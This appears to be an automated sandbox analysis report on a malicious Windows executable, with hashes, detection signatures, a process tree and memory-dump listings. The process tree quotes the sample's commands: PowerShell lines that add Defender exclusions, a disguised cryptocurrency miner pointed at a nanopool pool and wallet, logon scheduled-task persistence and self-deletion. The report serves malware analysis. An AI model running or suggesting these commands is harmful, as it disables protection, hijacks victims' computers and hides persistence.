Analysis

  • max time kernel
    1s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    22/12/2023, 13:51

General

  • Target

    af9721f9690603beffdb08ccb2b8196a.exe

  • Size

    12.9MB

  • MD5

    af9721f9690603beffdb08ccb2b8196a

  • SHA1

    f2531c0a5d3b3670c369c1b56c3d48ce9983cb46

  • SHA256

    05346140fbd935a2bd11cdb627178453624d5c2556ce5d253bd1a35095eaf0c9

  • SHA512

    8d7ce747f31e51fd218fe3faa5831a25de14f7df63b541938c8490f85d0f62800e0e2fb6190587bb20b23cbe3c70cd268f1ac133c3e79c3adf2d7da9582345c8

  • SSDEEP

    393216:5BIVza8DRgTzJDmTcdUHWM2Yk/6MgkkZqL:LSJRgPJ8cdUvkyMZL

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • VMProtect packed file 8 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Drops file in Windows directory 13 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Runs net.exe
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\af9721f9690603beffdb08ccb2b8196a.exe
    "C:\Users\Admin\AppData\Local\Temp\af9721f9690603beffdb08ccb2b8196a.exe"
    1⤵
      PID:2508
      • C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe
        "C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe"
        2⤵
        • Executes dropped EXE
        • Drops file in Windows directory
        PID:3024
    • C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 FILE
      1⤵
        PID:2680
      • C:\Windows\system32\cmd.exe
        "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
        1⤵
          PID:3048
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
            2⤵
              PID:2128
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
              2⤵
                PID:1944
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                2⤵
                  PID:1096
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                  2⤵
                    PID:2368
                • C:\Windows\Windows.exe
                  Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 0
                  1⤵
                    PID:3004
                  • C:\Windows\Windows.exe
                    Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0
                    1⤵
                      PID:2704
                      • C:\Windows\Windows.exe
                        Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 1
                        2⤵
                          PID:952
                        • C:\Windows\Windows.exe
                          Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 2
                          2⤵
                            PID:1656
                          • C:\Windows\Windows.exe
                            Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 3
                            2⤵
                              PID:2604
                            • C:\Windows\Windows.exe
                              Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 4
                              2⤵
                                PID:976
                              • C:\Windows\Windows.exe
                                Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 5
                                2⤵
                                  PID:1940
                                • C:\Windows\Windows.exe
                                  Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 6
                                  2⤵
                                    PID:1704
                                  • C:\Windows\Windows.exe
                                    Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 7
                                    2⤵
                                      PID:2848
                                    • C:\Windows\Windows.exe
                                      Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 8
                                      2⤵
                                        PID:2324
                                      • C:\Windows\Windows.exe
                                        Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 9
                                        2⤵
                                          PID:3060
                                        • C:\Windows\Windows.exe
                                          Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 10
                                          2⤵
                                            PID:1892
                                          • C:\Windows\Windows.exe
                                            Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 11
                                            2⤵
                                              PID:1248
                                          • C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe
                                            "C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe"
                                            1⤵
                                              PID:312
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe"
                                                2⤵
                                                  PID:1732
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /Create /XML C:\Windows\winserver.xml /tn winserver
                                                1⤵
                                                • Creates scheduled task(s)
                                                PID:3056
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c ""C:\Windows\WNDR.bat" "
                                                1⤵
                                                  PID:2648
                                                • C:\Windows\SysWOW64\net.exe
                                                  NET FILE
                                                  1⤵
                                                    PID:2644
                                                  • C:\Windows\WindowsNote.exe
                                                    "C:\Windows\WindowsNote.exe"
                                                    1⤵
                                                      PID:2788
                                                    • C:\Windows\SysWOW64\WScript.exe
                                                      "C:\Windows\System32\WScript.exe" "C:\Windows\WindowsUpdaters.vbs"
                                                      1⤵
                                                        PID:2748
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd /c ""C:\Windows\Winteste.bat" "
                                                        1⤵
                                                          PID:2840
                                                        • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
                                                          C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe"
                                                          1⤵
                                                            PID:784
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
                                                              2⤵
                                                                PID:2424
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
                                                                2⤵
                                                                  PID:2512
                                                                • C:\Windows\system32\services64.exe
                                                                  "C:\Windows\system32\services64.exe"
                                                                  2⤵
                                                                    PID:1608
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
                                                                  1⤵
                                                                  • Creates scheduled task(s)
                                                                  PID:1768
                                                                • C:\Windows\system32\cmd.exe
                                                                  "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                                  1⤵
                                                                    PID:2520
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                      2⤵
                                                                        PID:2708
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                        2⤵
                                                                          PID:2872
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                          2⤵
                                                                            PID:2672
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                            2⤵
                                                                              PID:1248
                                                                          • C:\Windows\system32\choice.exe
                                                                            choice /C Y /N /D Y /T 3
                                                                            1⤵
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:2508

                                                                          Network

                                                                                MITRE ATT&CK Enterprise v15

                                                                                Replay Monitor

                                                                                Loading Replay Monitor...

                                                                                Downloads

                                                                                • memory/312-184-0x000007FEF5750000-0x000007FEF613C000-memory.dmp

                                                                                  Filesize

                                                                                  9.9MB

                                                                                • memory/312-66-0x000007FEF5750000-0x000007FEF613C000-memory.dmp

                                                                                  Filesize

                                                                                  9.9MB

                                                                                • memory/312-137-0x000000001BC60000-0x000000001BCE0000-memory.dmp

                                                                                  Filesize

                                                                                  512KB

                                                                                • memory/312-131-0x000007FEF5750000-0x000007FEF613C000-memory.dmp

                                                                                  Filesize

                                                                                  9.9MB

                                                                                • memory/312-67-0x000000001BC60000-0x000000001BCE0000-memory.dmp

                                                                                  Filesize

                                                                                  512KB

                                                                                • memory/312-64-0x000000013FBC0000-0x000000013FDD4000-memory.dmp

                                                                                  Filesize

                                                                                  2.1MB

                                                                                • memory/784-194-0x000007FEF5750000-0x000007FEF613C000-memory.dmp

                                                                                  Filesize

                                                                                  9.9MB

                                                                                • memory/784-185-0x000007FEF5750000-0x000007FEF613C000-memory.dmp

                                                                                  Filesize

                                                                                  9.9MB

                                                                                • memory/784-183-0x000000013F6F0000-0x000000013F8F6000-memory.dmp

                                                                                  Filesize

                                                                                  2.0MB

                                                                                • memory/784-186-0x000000001B580000-0x000000001B600000-memory.dmp

                                                                                  Filesize

                                                                                  512KB

                                                                                • memory/952-177-0x0000000077180000-0x0000000077329000-memory.dmp

                                                                                  Filesize

                                                                                  1.7MB

                                                                                • memory/952-171-0x0000000140000000-0x0000000141B3D000-memory.dmp

                                                                                  Filesize

                                                                                  27.2MB

                                                                                • memory/952-176-0x0000000140000000-0x0000000141B3D000-memory.dmp

                                                                                  Filesize

                                                                                  27.2MB

                                                                                • memory/952-172-0x0000000077180000-0x0000000077329000-memory.dmp

                                                                                  Filesize

                                                                                  1.7MB

                                                                                • memory/1096-133-0x0000000002B20000-0x0000000002BA0000-memory.dmp

                                                                                  Filesize

                                                                                  512KB

                                                                                • memory/1096-138-0x0000000002B20000-0x0000000002BA0000-memory.dmp

                                                                                  Filesize

                                                                                  512KB

                                                                                • memory/1096-139-0x000007FEF2010000-0x000007FEF29AD000-memory.dmp

                                                                                  Filesize

                                                                                  9.6MB

                                                                                • memory/1096-135-0x0000000002B20000-0x0000000002BA0000-memory.dmp

                                                                                  Filesize

                                                                                  512KB

                                                                                • memory/1096-136-0x0000000002B20000-0x0000000002BA0000-memory.dmp

                                                                                  Filesize

                                                                                  512KB

                                                                                • memory/1096-134-0x000007FEF2010000-0x000007FEF29AD000-memory.dmp

                                                                                  Filesize

                                                                                  9.6MB

                                                                                • memory/1096-132-0x000007FEF2010000-0x000007FEF29AD000-memory.dmp

                                                                                  Filesize

                                                                                  9.6MB

                                                                                • memory/1608-196-0x000000001ADC0000-0x000000001AE40000-memory.dmp

                                                                                  Filesize

                                                                                  512KB

                                                                                • memory/1608-195-0x000007FEF5750000-0x000007FEF613C000-memory.dmp

                                                                                  Filesize

                                                                                  9.9MB

                                                                                • memory/1608-193-0x000000013F1A0000-0x000000013F3B4000-memory.dmp

                                                                                  Filesize

                                                                                  2.1MB

                                                                                • memory/1656-256-0x0000000140000000-0x0000000141B3D000-memory.dmp

                                                                                  Filesize

                                                                                  27.2MB

                                                                                • memory/1944-123-0x0000000002A20000-0x0000000002AA0000-memory.dmp

                                                                                  Filesize

                                                                                  512KB

                                                                                • memory/1944-124-0x000007FEF29B0000-0x000007FEF334D000-memory.dmp

                                                                                  Filesize

                                                                                  9.6MB

                                                                                • memory/1944-122-0x0000000002A20000-0x0000000002AA0000-memory.dmp

                                                                                  Filesize

                                                                                  512KB

                                                                                • memory/1944-120-0x000007FEF29B0000-0x000007FEF334D000-memory.dmp

                                                                                  Filesize

                                                                                  9.6MB

                                                                                • memory/1944-118-0x000007FEF29B0000-0x000007FEF334D000-memory.dmp

                                                                                  Filesize

                                                                                  9.6MB

                                                                                • memory/1944-119-0x0000000002A20000-0x0000000002AA0000-memory.dmp

                                                                                  Filesize

                                                                                  512KB

                                                                                • memory/1944-121-0x0000000002A20000-0x0000000002AA0000-memory.dmp

                                                                                  Filesize

                                                                                  512KB

                                                                                • memory/2128-73-0x0000000001E10000-0x0000000001E18000-memory.dmp

                                                                                  Filesize

                                                                                  32KB

                                                                                • memory/2128-79-0x000007FEF29B0000-0x000007FEF334D000-memory.dmp

                                                                                  Filesize

                                                                                  9.6MB

                                                                                • memory/2128-80-0x0000000002D30000-0x0000000002DB0000-memory.dmp

                                                                                  Filesize

                                                                                  512KB

                                                                                • memory/2128-78-0x0000000002D30000-0x0000000002DB0000-memory.dmp

                                                                                  Filesize

                                                                                  512KB

                                                                                • memory/2128-77-0x0000000002D34000-0x0000000002D37000-memory.dmp

                                                                                  Filesize

                                                                                  12KB

                                                                                • memory/2128-140-0x0000000002D30000-0x0000000002DB0000-memory.dmp

                                                                                  Filesize

                                                                                  512KB

                                                                                • memory/2128-72-0x000000001B700000-0x000000001B9E2000-memory.dmp

                                                                                  Filesize

                                                                                  2.9MB

                                                                                • memory/2128-75-0x0000000002D30000-0x0000000002DB0000-memory.dmp

                                                                                  Filesize

                                                                                  512KB

                                                                                • memory/2128-74-0x000007FEF29B0000-0x000007FEF334D000-memory.dmp

                                                                                  Filesize

                                                                                  9.6MB

                                                                                • memory/2128-76-0x000007FEF29B0000-0x000007FEF334D000-memory.dmp

                                                                                  Filesize

                                                                                  9.6MB

                                                                                • memory/2368-88-0x0000000002810000-0x0000000002818000-memory.dmp

                                                                                  Filesize

                                                                                  32KB

                                                                                • memory/2368-109-0x000007FEF2010000-0x000007FEF29AD000-memory.dmp

                                                                                  Filesize

                                                                                  9.6MB

                                                                                • memory/2368-107-0x0000000002C00000-0x0000000002C80000-memory.dmp

                                                                                  Filesize

                                                                                  512KB

                                                                                • memory/2368-87-0x000000001B580000-0x000000001B862000-memory.dmp

                                                                                  Filesize

                                                                                  2.9MB

                                                                                • memory/2368-100-0x0000000002C00000-0x0000000002C80000-memory.dmp

                                                                                  Filesize

                                                                                  512KB

                                                                                • memory/2368-92-0x000007FEF2010000-0x000007FEF29AD000-memory.dmp

                                                                                  Filesize

                                                                                  9.6MB

                                                                                • memory/2368-94-0x0000000002C00000-0x0000000002C80000-memory.dmp

                                                                                  Filesize

                                                                                  512KB

                                                                                • memory/2368-96-0x0000000002C00000-0x0000000002C80000-memory.dmp

                                                                                  Filesize

                                                                                  512KB

                                                                                • memory/2508-1-0x0000000000400000-0x00000000010F6000-memory.dmp

                                                                                  Filesize

                                                                                  13.0MB

                                                                                • memory/2508-0-0x0000000074380000-0x0000000074A6E000-memory.dmp

                                                                                  Filesize

                                                                                  6.9MB

                                                                                • memory/2508-2-0x0000000005330000-0x0000000005370000-memory.dmp

                                                                                  Filesize

                                                                                  256KB

                                                                                • memory/2508-10-0x0000000074380000-0x0000000074A6E000-memory.dmp

                                                                                  Filesize

                                                                                  6.9MB

                                                                                • memory/2704-98-0x0000000077330000-0x0000000077332000-memory.dmp

                                                                                  Filesize

                                                                                  8KB

                                                                                • memory/2704-145-0x0000000140000000-0x0000000141B3D000-memory.dmp

                                                                                  Filesize

                                                                                  27.2MB

                                                                                • memory/2704-105-0x0000000077340000-0x0000000077342000-memory.dmp

                                                                                  Filesize

                                                                                  8KB

                                                                                • memory/2704-159-0x0000000077180000-0x0000000077329000-memory.dmp

                                                                                  Filesize

                                                                                  1.7MB

                                                                                • memory/2704-106-0x0000000140000000-0x0000000141B3D000-memory.dmp

                                                                                  Filesize

                                                                                  27.2MB

                                                                                • memory/2704-89-0x0000000140000000-0x0000000141B3D000-memory.dmp

                                                                                  Filesize

                                                                                  27.2MB

                                                                                • memory/2704-90-0x0000000077330000-0x0000000077332000-memory.dmp

                                                                                  Filesize

                                                                                  8KB

                                                                                • memory/2704-93-0x0000000077330000-0x0000000077332000-memory.dmp

                                                                                  Filesize

                                                                                  8KB

                                                                                • memory/2704-99-0x0000000077340000-0x0000000077342000-memory.dmp

                                                                                  Filesize

                                                                                  8KB

                                                                                • memory/2704-102-0x0000000077180000-0x0000000077329000-memory.dmp

                                                                                  Filesize

                                                                                  1.7MB

                                                                                • memory/2704-103-0x0000000077340000-0x0000000077342000-memory.dmp

                                                                                  Filesize

                                                                                  8KB

                                                                                • memory/2788-50-0x0000000000400000-0x000000000061A000-memory.dmp

                                                                                  Filesize

                                                                                  2.1MB

                                                                                • memory/2788-51-0x0000000073080000-0x000000007376E000-memory.dmp

                                                                                  Filesize

                                                                                  6.9MB

                                                                                • memory/2788-53-0x0000000004610000-0x0000000004650000-memory.dmp

                                                                                  Filesize

                                                                                  256KB

                                                                                • memory/2788-61-0x0000000073080000-0x000000007376E000-memory.dmp

                                                                                  Filesize

                                                                                  6.9MB

                                                                                • memory/3004-157-0x0000000140000000-0x0000000141B3D000-memory.dmp

                                                                                  Filesize

                                                                                  27.2MB

                                                                                • memory/3004-158-0x0000000077180000-0x0000000077329000-memory.dmp

                                                                                  Filesize

                                                                                  1.7MB

                                                                                • memory/3004-153-0x0000000140000000-0x0000000141B3D000-memory.dmp

                                                                                  Filesize

                                                                                  27.2MB

                                                                                • memory/3004-147-0x0000000077180000-0x0000000077329000-memory.dmp

                                                                                  Filesize

                                                                                  1.7MB